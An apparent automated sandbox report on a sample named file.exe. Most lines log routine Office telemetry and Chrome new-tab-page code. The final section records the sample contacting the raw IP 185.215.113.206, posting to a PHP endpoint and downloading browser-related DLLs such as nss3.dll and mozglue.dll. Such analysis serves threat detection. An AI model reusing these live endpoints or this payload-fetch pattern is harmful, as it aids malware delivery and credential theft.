Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: chrome.exe, 00000001.00000002.1928092777.00004A30006E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000001.00000002.1928092777.00004A30006E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000001.00000003.1833623628.00004A3000F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1833722073.00004A3000F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1833846706.00004A30002F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000001.00000003.1833623628.00004A3000F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1833722073.00004A3000F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000001.00000003.1833846706.00004A30002F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000001.00000002.1928092777.00004A30006E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000001.00000002.1928092777.00004A30006E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000001.00000002.1925666200.00004A30002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 913sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: file.exe, 00000000.00000002.2080967365.0000000000436000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2082345429.000000000119E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2080967365.000000000037C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2082345429.00000000011F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2082345429.00000000011F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/0
Source: file.exe, 00000000.00000002.2082345429.00000000011E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082345429.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2080967365.000000000037C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2082345429.00000000011F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php7
Source: file.exe, 00000000.00000002.2082345429.00000000011F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php:
Source: file.exe, 00000000.00000002.2082345429.00000000011E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpC
Source: file.exe, 00000000.00000002.2082345429.00000000011F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpDAAFIIJDAAAAKFHID
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpFs9
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpI
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpSs
Source: file.exe, 00000000.00000002.2082345429.000000000119E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpam
Source: file.exe, 00000000.00000002.2082345429.000000000119E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpe
Source: file.exe, 00000000.00000002.2080967365.000000000037C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpion:
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phplZs
Source: file.exe, 00000000.00000002.2082345429.000000000119E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dll
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dlll
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dll
Source: file.exe, 00000000.00000002.2082345429.0000000001213000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dllh
